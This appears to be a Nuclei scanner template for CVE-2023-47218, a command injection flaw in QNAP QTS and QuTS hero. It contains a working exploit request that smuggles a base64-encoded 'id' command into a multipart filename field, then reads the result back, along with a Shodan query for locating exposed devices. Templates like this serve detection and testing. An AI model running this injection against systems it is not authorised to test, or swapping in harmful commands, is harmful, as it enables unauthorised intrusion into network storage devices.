59 lines
2.3 KiB
YAML
59 lines
2.3 KiB
YAML
id: CVE-2023-47218
|
||
|
||
info:
|
||
name: QNAP QTS and QuTS Hero - OS Command Injection
|
||
author: ritikchaddha
|
||
severity: medium
|
||
description: |
|
||
An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.
|
||
reference:
|
||
- https://github.com/passwa11/CVE-2023-47218
|
||
- https://twitter.com/win3zz/status/1760224052289888668/photo/3
|
||
- https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/
|
||
- https://nvd.nist.gov/vuln/detail/CVE-2023-47218
|
||
- https://www.qnap.com/en/security-advisory/qsa-23-57
|
||
classification:
|
||
cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||
cvss-score: 5.8
|
||
cve-id: CVE-2023-47218
|
||
cwe-id: CWE-77
|
||
epss-score: 0.00305
|
||
epss-percentile: 0.69699
|
||
cpe: cpe:2.3:o:qnap:qts:*:*:*:*:*:*:*:*
|
||
metadata:
|
||
verified: true
|
||
max-request: 2
|
||
shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS"
|
||
product: qts
|
||
vendor: qnap
|
||
tags: cve,cve2023,qnap,qts,quts,rce,intrusive
|
||
variables:
|
||
file: '{{rand_base(6)}}'
|
||
cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22'
|
||
|
||
http:
|
||
- raw:
|
||
- |
|
||
POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1
|
||
Host: {{Hostname}}
|
||
Content-Type: multipart/form-data;boundary="avssqwfz"
|
||
|
||
--avssqwfz
|
||
Content-Disposition: form-data; xxpcscma="field2"; zczqildp="{{cmd}}"
|
||
Content-Type: text/plain
|
||
|
||
skfqduny
|
||
--avssqwfz–
|
||
|
||
- |
|
||
POST /cgi-bin/quick/{{file}} HTTP/1.1
|
||
Host: {{Hostname}}
|
||
|
||
matchers:
|
||
- type: dsl
|
||
dsl:
|
||
- 'contains_all(body_1, "code\": 200", "full_path_filename success")'
|
||
- 'contains_all(body_2, "uid=", "gid=")'
|
||
- 'status_code == 200'
|
||
condition: and
|
||
# digest: 4a0a004730450221008358db176b0061bd0baacd05564e79d9b380c11b6fdb1ae5f84622cffaa71ff1022018142b0839b30a177f7e5c59ce7428f98b6423c3089b2f0606496cf520aef97a:922c64590222798bb761d5b6d8e72950 |